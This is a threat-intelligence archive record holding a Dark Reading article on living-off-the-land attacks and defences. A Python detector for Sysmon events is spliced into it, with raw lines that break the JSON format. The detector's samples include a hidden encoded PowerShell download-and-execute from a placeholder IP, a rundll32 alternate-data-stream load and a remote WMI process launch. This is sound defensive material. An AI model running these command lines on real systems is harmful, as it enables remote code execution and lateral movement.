{
	"id": "47c909be-f369-4100-b1e5-5ad70ad746b8",
	"created_at": "2026-04-06T00:06:32.899207Z",
	"updated_at": "2026-04-10T03:33:30.022104Z",
	"deleted_at": null,
	"sha1_hash": "79aa6a61e2e0c362e03c102eead11e6e8f4b989f",
	"title": "Is an Attacker Living Off Your Land?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 528553,
	"plain_text": "Is an Attacker Living Off Your Land?\r\nBy Samuel Greengard\r\nPublished: 2021-06-16 · Archived: 2026-04-05 19:00:17 UTC\r\n(Image: Riverwalker via Adobe Stock)\r\nMalware, in all of its forms, including ransomware, has grown increasingly stealthy and sophisticated in recent years. Also on the rise: its ability to fly under the radar of security software.\r\nOne of the primary reasons detecting and stamping out malware is so difficult is the rise of an attack method called living off the land (LotL). Despite conjuring up idyllic images of urban farming or sustainability, the term refers to a group of techniques that run through the system's own shells, scripting engines, and in-memory code rather than through a malicious executable dropped to disk.\r\nAttackers who \"live off the land\" use a system's own tools and utilities to conduct malicious activity. Because these attacks do not rely on easily detectable malicious files, an attacker can lurk within a computer or network and avoid discovery by security tools that key on file signatures.\r\nEven if an attack is discovered, the binaries involved are exceptionally difficult to eradicate: they are legitimate, signed components of the operating system that administrators also depend on, so they cannot simply be quarantined or deleted. As a result, a LotL attack is particularly risky for victims.\r\nLiving Off the Land: A Brief History\r\nThe concept of fileless malware, or malware that relies on legitimate programs and memory-resident code rather than on files of its own, first appeared around the start of the current century (with the memory-resident Frodo virus of 1989 as an even earlier precursor). Early examples of this approach include malware with names like Frodo, Code Red, and the SQL Slammer worm. However, these payloads were more of a nuisance than a real threat. Then, in 2012, a banking Trojan named Lurk appeared. Although it wasn't terribly sophisticated, it demonstrated LotL's potential.\r\nIn 2013, security researchers Christopher Campbell and Matt Graeber coined the LotL term to describe malware that hides within a system and abuses legitimate tools and utilities to cause damage. Over the past few years, the scope and sophistication of these attacks have grown. In fact, as security firms have become better at identifying and blacklisting malicious files, fileless attacks have moved into the mainstream.\r\nhttps://www.darkreading.com/edge-articles/is-an-attacker-living-off-your-land-Page 1 of 3\r\nHow Does Living Off the Land Work?\r\nIn a LotL attack, adversaries take advantage of legitimate tools and utilities already present on a system: PowerShell, Visual Basic scripts run by the Windows Script Host, WMI, and Sysinternals PsExec, for example. Attacker tooling such as Mimikatz is then frequently loaded through these hosts (for instance, as an in-memory PowerShell module) rather than written to disk as a standalone binary. The attack hijacks functionality the system already provides and turns it to nefarious purposes. It may include tactics like DLL hijacking, hiding payloads, process memory dumping, downloading files, bypassing UAC, keylogging, compiling code on the host, log evasion, code execution, and persistence.\r\nCybercriminals use different methods and unleash different types of malware that fall into the general category of LotL. In many cases, they use tools such as POSHSPY, POWRUNER, and Astaroth that take advantage of LOLBins (living-off-the-land binaries) and fileless techniques to evade detection. Most attacks involve Windows binaries that mask malicious activities; however, LotL attacks can also affect macOS, Linux, Android, and cloud services.\r\nThe reason this approach works so well is that resources such as PowerShell and the Windows Script Host (wscript.exe, cscript.exe) offer capabilities that far exceed the needs of most organizations, and many of these features aren't switched off or removed when an organization doesn't require them. 
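As an added illustration (this code is not from the article, nor from Sophos, Malwarebytes or any other vendor it cites), the following Python scans a handful of constructed Sysmon-style process-creation records for the abuse patterns just described: a hidden, base64-encoded PowerShell command spawned by Word, rundll32 loading a DLL from a user-writable folder and from an NTFS alternate data stream, a remote WMI process creation, and the PsExec service starting on a target host. The event field names, the sample command lines (including the documentation address 198.51.100.7) and the rule thresholds are assumptions made for the example; real Sysmon output uses backslashes in paths, which the normalizer also accepts.

```python
# Added example (not code from the article or from any vendor it cites): a toy
# detector over Sysmon-style process-creation records. Field names, sample
# events and rule thresholds are assumptions made for this illustration.
import base64

BACKSLASH = chr(92)  # written this way so the listing contains no literal backslash

# Hosts an attacker typically lands in after a phish, and loaders that run
# code from a path handed to them on the command line.
OFFICE = ('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe')
SCRIPT_HOSTS = ('powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe',
                'mshta.exe', 'cmd.exe', 'rundll32.exe', 'regsvr32.exe')
LOADERS = ('rundll32.exe', 'regsvr32.exe', 'mshta.exe')
# Directories an unprivileged user can write to (lower-case, forward slashes).
USER_WRITABLE = ('/users/', '/temp/', '/tmp/', '/programdata/', '/public/')


def norm(path):
    # Lower-case and use forward slashes so real Sysmon paths (backslashes) and
    # the forward-slash paths in the constructed sample compare the same way.
    return path.replace(BACKSLASH, '/').lower()


def basename(path):
    return norm(path).rsplit('/', 1)[-1]


def is_ads_path(path):
    # C:/dir/file.txt:stream -> a colon after the drive letter marks an NTFS
    # alternate data stream; URLs (regsvr32 /i:http://...) are excluded.
    p = norm(path)
    body = p[2:] if len(p) > 1 and p[1] == ':' else p
    return ':' in body and '://' not in body


def decode_encoded_command(tokens):
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
    # -enc); the argument is base64 of a UTF-16LE string. Returns the decoded
    # command, or None when no encoded command is present or it does not parse.
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if t.startswith('-e') and '-encodedcommand'.startswith(t):
            try:
                return base64.b64decode(tokens[i + 1]).decode('utf-16-le')
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def check(event):
    # Returns a list of (rule, detail) pairs for one process-creation record.
    image = basename(event['Image'])
    parent = basename(event['ParentImage'])
    tokens = event['CommandLine'].split()  # toy tokenizer; quoted arguments need more care
    low = [t.lower() for t in tokens]
    hits = []
    if image in ('powershell.exe', 'pwsh.exe'):
        decoded = decode_encoded_command(tokens)
        if decoded is not None:
            hits.append(('encoded_powershell', decoded))
        for i in range(1, len(low)):
            if low[i] == 'hidden' and low[i - 1].startswith('-w'):
                hits.append(('hidden_window', tokens[i - 1] + ' ' + tokens[i]))
    if image in LOADERS:
        for tok in tokens[1:]:
            target = norm(tok.split(',')[0])  # rundll32 takes dll,EntryPoint
            if any(d in target for d in USER_WRITABLE):
                hits.append(('loader_runs_user_writable_path', tok))
            if is_ads_path(target):
                hits.append(('alternate_data_stream', tok))
    if image == 'wmic.exe':
        cmd = ' '.join(low)
        if '/node:' in cmd and 'process call create' in cmd:
            hits.append(('wmi_remote_process_create', event['CommandLine']))
    if image == 'psexesvc.exe':
        # PSEXESVC.exe is the service PsExec drops on the target; seeing it
        # start under services.exe means someone ran PsExec against this host.
        hits.append(('psexec_service_on_host', parent))
    if parent in OFFICE and image in SCRIPT_HOSTS:
        hits.append(('office_spawns_script_host', parent + ' -> ' + image))
    return hits


def scan(events):
    return [(idx, rule, detail) for idx, ev in enumerate(events)
            for rule, detail in check(ev)]


def rules_by_event(events):
    # Convenience view: event index -> list of rule names that fired.
    out = {}
    for idx, rule, _detail in scan(events):
        out.setdefault(idx, []).append(rule)
    return out


# Constructed sample. The encoded command is built here from its plaintext so
# the decoding path is exercised; 198.51.100.7 is a documentation address.
PAYLOAD = 'IEX (IWR http://198.51.100.7/a.ps1 -UseBasicParsing)'
ENCODED = base64.b64encode(PAYLOAD.encode('utf-16-le')).decode('ascii')
SAMPLE_EVENTS = [
    {'ParentImage': 'C:/Program Files/Microsoft Office/root/Office16/WINWORD.EXE',
     'Image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'CommandLine': 'powershell.exe -nop -w hidden -enc ' + ENCODED},
    {'ParentImage': 'C:/Windows/System32/cmd.exe',
     'Image': 'C:/Windows/System32/rundll32.exe',
     'CommandLine': 'rundll32.exe C:/Users/alice/AppData/Local/Temp/notes.txt:payload.dll,DllMain'},
    {'ParentImage': 'C:/Windows/System32/cmd.exe',
     'Image': 'C:/Windows/System32/wbem/WMIC.exe',
     'CommandLine': 'wmic.exe /node:FS01 /user:svc_backup process call create C:/Users/Public/r.exe'},
    {'ParentImage': 'C:/Windows/System32/services.exe',
     'Image': 'C:/Windows/PSEXESVC.exe',
     'CommandLine': 'C:/Windows/PSEXESVC.exe'},
    {'ParentImage': 'C:/Windows/explorer.exe',  # benign Control Panel launch
     'Image': 'C:/Windows/System32/rundll32.exe',
     'CommandLine': 'rundll32.exe C:/Windows/System32/shell32.dll,Control_RunDLL'},
    {'ParentImage': 'C:/Windows/System32/svchost.exe',  # benign scheduled task
     'Image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'CommandLine': 'powershell.exe -ExecutionPolicy Bypass -File C:/Scripts/backup.ps1'},
]

if __name__ == '__main__':
    for idx, rule, detail in scan(SAMPLE_EVENTS):
        print(idx, rule, detail)
```

Run as a script it prints one line per finding, including the decoded PowerShell command; the two benign records (a Control Panel launch and a scheduled backup script) produce none. That is the point of keying on parent process, argument path and encoding rather than on the binary name alone: every executable in the sample is a signed Microsoft file, so a file-signature check has nothing to flag.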
Overall, more than 100 Windows binaries, scripts, and libraries can be abused this way, according to the community-maintained LOLBAS project, which catalogs them on GitHub.\r\nWhat Do LotL Attacks Look Like?\r\nOnce attackers have a foothold inside a legitimate tool such as PowerShell, they can reach other legitimate processes and code on the host, including other languages and runtimes where they are present, such as Perl or Python interpreters or a C++ toolchain.\r\nFor example, an attacker might create a script that holds a list of targeted machines and, using an account with administrative privileges, run PsExec to copy and execute malware on each peer machine. Another possible method is to push a logon or logoff script through a Group Policy Object (GPO), or to abuse Windows Management Instrumentation (WMI) to create processes on remote hosts and mass-distribute ransomware inside the network.\r\nA similar approach injects malicious code into a trusted running process such as SVCHOST.EXE, or loads it through the Windows RUNDLL32.EXE host. This makes it possible to encrypt documents from a trusted process, cybersecurity firm Sophos reports. The tactic can evade anti-ransomware products that do not monitor, or are configured to ignore, encryption activity by default Windows applications.\r\nRansomware may also run from an NTFS Alternate Data Stream (ADS) to hide from both victim users and endpoint protection software, Malwarebytes Labs points out: the payload is attached to an innocuous-looking file, and a normal directory listing does not show it, although dir /r and PowerShell's Get-Item -Stream * do. Oftentimes, the entire attack takes place within a few hours or during the night when staff pay less attention to IT systems. Once the malware has encrypted files, the victim winds up with a locked screen and a ransom note.\r\nThese attacks often appear to come out of nowhere because the actual file encryption is performed by the trusted PowerShell.exe process. As a result, endpoint protection software may not flag the activity because the process appears to be legitimate, according to Sophos.\r\nOne of the most widely publicized LotL attacks occurred in 2017, when the NotPetya variant of the so-called Petya malware appeared. 
It initially spread through a compromised update of accounting software used in Ukraine and then moved laterally across companies' networks with PsExec and WMI alongside the EternalBlue exploit. More recently, the SolarWinds attack, a.k.a. SUNBURST, used LotL techniques and other methods after a backdoor was planted in one of the IT management vendor's Orion software updates.\r\nReducing Risk Is Critical\r\nThere's no simple way to avoid the risk of a LotL attack. It's also difficult to determine who is initiating the attack because of the stealthy nature of the tooling.\r\nIn general, the best defense is to ensure that unneeded components are switched off or removed from systems. Other strategies include setting up application allowlisting where possible (on Windows, AppLocker or Windows Defender Application Control can restrict which binaries and scripts may run, including the built-in ones), turning on the logging the built-in tools already offer (PowerShell script block logging and Sysmon process-creation events record the command lines these attacks depend on), using behavioral analytics software that watches for abnormal parent-child process chains rather than file signatures, patching and updating components regularly, using multifactor authentication, and continuing to educate users about the risks of clicking email links and opening attachments.\r\nAbout the Author\r\nFreelance Writer\r\nSamuel Greengard writes about business, technology, and cybersecurity for numerous magazines and websites. He is author of the books \"The Internet of Things\" and \"Virtual Reality\" (MIT Press).\r\nSource: https://www.darkreading.com/edge-articles/is-an-attacker-living-off-your-land-",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.darkreading.com/edge-articles/is-an-attacker-living-off-your-land-"
	],
	"report_names": [
		"is-an-attacker-living-off-your-land-"
	],
	"threat_actors": [
		{
			"id": "dcba8e2b-93e0-4d6e-a15f-5c44faebc3b1",
			"created_at": "2022-10-25T16:07:23.816991Z",
			"updated_at": "2026-04-10T02:00:04.758143Z",
			"deleted_at": null,
			"main_name": "Lurk",
			"aliases": [],
			"source_name": "ETDA:Lurk",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433992,
	"ts_updated_at": 1775792010,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/79aa6a61e2e0c362e03c102eead11e6e8f4b989f.pdf",
		"text": "https://archive.orkl.eu/79aa6a61e2e0c362e03c102eead11e6e8f4b989f.txt",
		"img": "https://archive.orkl.eu/79aa6a61e2e0c362e03c102eead11e6e8f4b989f.jpg"
	}
}